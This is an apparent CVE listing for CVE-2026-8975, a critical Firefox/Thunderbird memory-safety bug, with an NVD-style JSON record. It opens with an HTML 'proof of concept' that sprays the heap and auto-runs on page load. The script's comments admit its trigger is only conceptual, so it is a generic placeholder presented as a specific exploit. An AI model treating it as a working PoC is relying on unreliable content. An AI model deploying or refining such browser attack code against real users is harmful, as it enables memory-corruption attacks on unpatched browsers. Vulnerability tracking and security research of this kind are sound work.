CVE-2026-8975

<!-- Proof of Concept (PoC) for CVE-2026-8975 This script attempts to trigger the memory corruption vulnerability in vulnerable versions of Firefox/Thunderbird. --> <html> <head> <title>CVE-2026-8975 PoC</title> </head> <body> <script> function trigger_bug() { // Simulate memory allocation pattern to corrupt heap var payload_size = 0x2000; var spray = new Array(100); // Heap spraying preparation for (var i = 0; i < spray.length; i++) { spray[i] = new Uint8Array(payload_size); // Fill with pattern that might trigger corruption for (var j = 0; j < payload_size; j++) { spray[i][j] = 0x41; // 'A' } } // Attempt to invoke vulnerable function (Conceptual) // In a real scenario, specific API calls or DOM manipulation would be used here try { var vulnerable_obj = document.createElement('object'); // Malicious data assignment to trigger memory safety bug vulnerable_obj.data = "AAAA..."; document.body.appendChild(vulnerable_obj); } catch(e) { console.log("Exception caught: " + e.message); } } // Auto-trigger on load window.onload = trigger_bug; </script> <h1>CVE-2026-8975 Memory Corruption Test</h1> <p>If the browser crashes or exhibits unusual behavior, it may be vulnerable.</p> </body> </html>

{"cve": {"id": "CVE-2026-8975", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:54.090", "lastModified": "2026-05-19T18:16:37.700", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://bugzilla.mozilla.org/buglist.cgi?bug_id=1860195%2C2029325%2C2029429%2C2029910%2C2035915%2C2038678%2C2038669", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-47/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-48/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-50/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-51/", "source": "[email protected]"}]}}